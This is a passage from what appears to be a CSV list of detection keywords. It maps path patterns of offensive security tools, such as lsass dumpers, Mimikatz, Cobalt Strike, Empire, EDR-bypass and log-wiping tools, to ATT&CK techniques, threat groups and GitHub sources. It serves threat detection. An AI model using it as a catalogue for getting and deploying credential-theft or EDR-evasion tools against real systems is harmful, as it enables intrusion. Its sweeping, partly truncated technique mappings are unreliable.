T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/download-stager.js*,offensive_tool_keyword,empire,Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,N/A,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*/dpap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dpipe.sh*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker,1,1,N/A,N/A,1,55,28,2023-06-14T23:25:46Z,2022-03-08T17:13:24Z -*/dploot.git*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*/drda-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/drda-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Drones/SleepDialogue.razor*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/drunkpotato*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/dsniff.c*,offensive_tool_keyword,dsniff,password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. SymantecpcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).,T1110 - T1040 - T1074.001 - T1555.002 - T1555.003,TA0001 - TA0002 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/tecknicaltom/dsniff,1,0,N/A,N/A,2,167,44,2010-06-29T05:53:39Z,2010-06-23T13:11:11Z -*/dsniff.services*,offensive_tool_keyword,dsniff,password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).,T1110 - T1040 - T1074.001 - T1555.002 - T1555.003,TA0001 - TA0002 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/tecknicaltom/dsniff,1,0,N/A,N/A,2,167,44,2010-06-29T05:53:39Z,2010-06-23T13:11:11Z -*/ducky.py,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/DueDLLigence.git*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,1,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*/dukes_apt29.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/dump_lsass.*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/DumpCerts*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 script argument,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*/DumpCreds*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 script argument,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*/dumpert.c*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*/Dumpert/*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*/dumpmethod/*.py,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*/DumpShellcode/*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*/DumpsterFire/*,offensive_tool_keyword,DumpsterFire,The DumpsterFire Toolset is a modular. menu-driven. cross-platform tool for building repeatable. time-delayed. distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents. distractions. and lures to support and scale their operations. Turn paper tabletop exercises into controlled live fire range events. Build event sequences (narratives) to simulate realistic scenarios and generate corresponding network and filesystem artifacts.,T1175 - T1176 - T1589,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/TryCatchHCF/DumpsterFire,1,0,N/A,N/A,10,934,152,2020-05-27T15:00:56Z,2017-10-05T23:44:54Z -*/dumpweb.log*,offensive_tool_keyword,chromedump,ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser,T1059.007 - T1114.001 - T1518.001 - T1552.002,TA0005 - TA0009 - TA0011,N/A,N/A,Credential Access,https://github.com/g4l4drim/ChromeDump,1,1,N/A,N/A,1,54,1,2023-06-30T09:07:59Z,2023-01-26T20:44:06Z -*/dumpXor.exe*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,1,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*/dumpXor/dumpXor*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,1,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*/dunderhay/CVE-202*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/dunderhay/CVE-2020-5902,1,1,N/A,N/A,1,37,8,2023-10-03T01:42:19Z,2020-07-06T04:03:58Z -*/duplicates.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/e2e_commands.txt*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*/e2e_test.py*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*/eap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Ebowla.git*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,1,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*/ebowla.py*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,1,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*/ec2__backdoor_ec2_sec_groups*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/ec2__check_termination_protection*.py,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/ec2__startup_shell_script/main.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/ec2_public_ips_*_*.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/EC2Looter.py*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,1,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*/echoac-poc.git*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,1,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*/edb-35948/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/EDD.exe,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*/EDRaser.git*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*/edraser.py*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*/edr-checker/*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/EDRSandblast.git*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*/EDRSandblast/*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*/EfsPotato.git*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z -*/egghunter.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to 